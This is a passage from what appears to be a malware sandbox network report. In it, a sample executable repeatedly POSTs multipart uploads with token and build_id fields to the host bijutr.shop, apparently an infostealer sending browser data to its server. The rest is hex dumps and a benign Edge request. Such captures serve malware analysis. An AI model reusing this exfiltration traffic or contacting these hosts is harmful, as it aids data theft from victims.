                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:43 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:43 UTC16355OUTData Raw: 30 63 32 4e 79 5a 57 56 75 58 33 56 79 62 46 39 69 62 47 39 6a 61 33 4e 66 59 6e 6c 77 59 58 4e 7a 5a 57 52 66 59 32 39 31 62 6e 52 6c 63 69 42 4a 54 6c 52 46 52 30 56 53 4c 48 4e 74 59 58 4a 30 63 32 4e 79 5a 57 56 75 58 32 52 76 64 32 35 73 62 32 46 6b 58 32 4a 73 62 32 4e 72 63 31 39 6a 62 33 56 75 64 47 56 79 49 45 6c 4f 56 45 56 48 52 56 49 73 63 32 31 68 63 6e 52 7a 59 33 4a 6c 5a 57 35 66 5a 47 39 33 62 6d 78 76 59 57 52 66 59 6d 78 76 59 32 74 7a 58 32 4a 35 63 47 46 7a 63 32 56 6b 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 7a 62 57 46 79 64 48 4e 6a 63 6d 56 6c 62 6c 39 74 59 57 78 32 5a 58 4a 30 61 58 4e 70 62 6d 64 66 59 6d 78 76 59 32 74 7a 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 68 59 6e
                                                                                                                                                                                                                                                                        Data Ascii: 0c2NyZWVuX3VybF9ibG9ja3NfYnlwYXNzZWRfY291bnRlciBJTlRFR0VSLHNtYXJ0c2NyZWVuX2Rvd25sb2FkX2Jsb2Nrc19jb3VudGVyIElOVEVHRVIsc21hcnRzY3JlZW5fZG93bmxvYWRfYmxvY2tzX2J5cGFzc2VkX2NvdW50ZXIgSU5URUdFUixzbWFydHNjcmVlbl9tYWx2ZXJ0aXNpbmdfYmxvY2tzX2NvdW50ZXIgSU5URUdFUixhYn
                                                                                                                                                                                                                                                                        2024-12-27 07:20:43 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:45 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:20:45 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        25192.168.2.549875188.245.216.2054436584C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:20:44 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----47GLNO8GLN7QIM7Q9HDT
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                        Content-Length: 393697
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        2024-12-27 07:20:44 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 34 37 47 4c 4e 4f 38 47 4c 4e 37 51 49 4d 37 51 39 48 44 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 32 35 31 64 39 64 32 33 33 66 63 36 63 36 34 64 31 64 65 32 33 65 35 65 61 32 64 64 35 61 0d 0a 2d 2d 2d 2d 2d 2d 34 37 47 4c 4e 4f 38 47 4c 4e 37 51 49 4d 37 51 39 48 44 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 66 33 33 66 34 66 31 33 36 61 39 35 36 31 39 61 32 36 32 32 31 64 33 34 61 36 35 35 35 34 30 0d 0a 2d 2d 2d 2d 2d 2d 34 37 47 4c 4e 4f 38 47 4c 4e 37 51 49 4d 37 51 39 48 44 54 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                        Data Ascii: ------47GLNO8GLN7QIM7Q9HDTContent-Disposition: form-data; name="token"46251d9d233fc6c64d1de23e5ea2dd5a------47GLNO8GLN7QIM7Q9HDTContent-Disposition: form-data; name="build_id"9f33f4f136a95619a26221d34a655540------47GLNO8GLN7QIM7Q9HDTCont
                                                                                                                                                                                                                                                                        2024-12-27 07:20:44 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:44 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:44 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:44 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:44 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:44 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:44 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:44 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:44 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                        2024-12-27 07:20:47 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:20:46 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        26192.168.2.54986623.209.72.254437500C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:20:47 UTC751OUTGET /statics/icons/favicon_newtabpage.png HTTP/1.1
                                                                                                                                                                                                                                                                        Host: assets.msn.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                        Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                        Cookie: _C_ETH=1; USRLOC=; MUID=2BA4C89BEAD6644B32BDDDF9EBCF652E; _EDGE_S=F=1&SID=2CAA7B291DCA69C1390F6E4B1C9F68D2; _EDGE_V=1
                                                                                                                                                                                                                                                                        2024-12-27 07:20:47 UTC1003INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                                        ETag: "bed4a7cc95f6106c7a3d46d2b50cb3f8:1614709529.490117"
                                                                                                                                                                                                                                                                        Last-Modified: Tue, 02 Mar 2021 18:25:29 GMT
                                                                                                                                                                                                                                                                        Server: AkamaiNetStorage
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:20:47 GMT
                                                                                                                                                                                                                                                                        Content-Length: 354
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        Akamai-Request-BC: [a=23.210.4.135,b=1961903625,c=g,n=US_NJ_SECAUCUS,o=20940]
                                                                                                                                                                                                                                                                        Server-Timing: clientrtt; dur=2, clienttt; dur=0, origin; dur=0, cdntime; dur=0, wpo;dur=0,1s;dur=0
                                                                                                                                                                                                                                                                        Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                        Akamai-Server-IP: 23.210.4.135
                                                                                                                                                                                                                                                                        Akamai-Request-ID: 74f04609
                                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
                                                                                                                                                                                                                                                                        nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
                                                                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                        Akamai-GRN: 0.8704d217.1735284047.74f04609
                                                                                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                                                                                        2024-12-27 07:20:47 UTC354INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 f7 49 44 41 54 78 01 ed 57 d1 0d 83 20 10 7d e9 04 8c d0 51 d8 a4 8e e0 06 32 42 37 b2 23 74 03 47 a0 1b b4 10 21 62 cb 79 ca d1 f8 c3 4b 5e 34 70 be 7b 22 07 08 34 fc 42 3b 8e 8e d6 f1 5d 91 5e f3 c6 25 1f 2a 27 cd 71 a0 92 77 49 90 71 54 44 5c 8c 39 02 af d5 27 cf ea 5c d0 18 3a 7b 46 ac c4 40 84 c1 f2 39 48 61 85 ff 19 50 e1 59 2b 11 8e 93 f3 8a 32 90 79 f6 1a 30 a8 33 19 8b 0d 78 dc 21 2f 53 91 01 09 56 79 2e 38 19 cd 40 33 b0 c7 c0 0d 73 c9 4d 58 ef 66 47 db 59 50 65 38 25 7d 56 d0 9e cd b3 67 04
                                                                                                                                                                                                                                                                        Data Ascii: PNGIHDR szzpHYs%%IR$sRGBgAMAaIDATxW }Q2B7#tG!byK^4p{"4B;]^%*'qwIqTD\9'\:{F@9HaPY+2y03x!/SVy.8@3sMXfGYPe8%}Vg


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        27192.168.2.549888188.245.216.2054436584C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:20:47 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----D2DBI5PPH4EUAIMOHVK6
